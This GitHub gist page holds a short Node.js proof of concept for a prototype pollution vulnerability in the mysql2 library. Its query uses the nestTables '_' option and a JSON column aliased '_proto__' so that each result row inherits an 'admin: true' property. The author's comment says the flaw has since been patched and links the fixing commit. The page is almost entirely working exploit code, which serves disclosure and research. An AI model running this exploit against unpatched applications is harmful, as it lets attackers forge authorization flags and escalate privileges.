Skip to content

Instantly share code, notes, and snippets.

@domdomi3

domdomi3/gist:e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a Secret

Created May 16, 2024 10:25
Show Gist options
  • Save domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a to your computer and use it in GitHub Desktop.
Save domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
const mysql = require('mysql2');
const connection = mysql.createConnection({
host: '127.0.0.1',
user: 'root',
database: 'test',
password: 'root',
});
let query_data = {
sql: `SELECT CAST('{"admin":true}' AS JSON)_proto__;`,
nestTables: "_",
};
connection.query(query_data, (err, results) => {
if (err) throw err;
console.log(Object.getPrototypeOf(results[0]));
console.log(results[0].admin);
});
connection.end();
@domdomi3
Copy link
Author

6 hours ago they patched this vulnerability.
sidorares/node-mysql2@efe3db5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment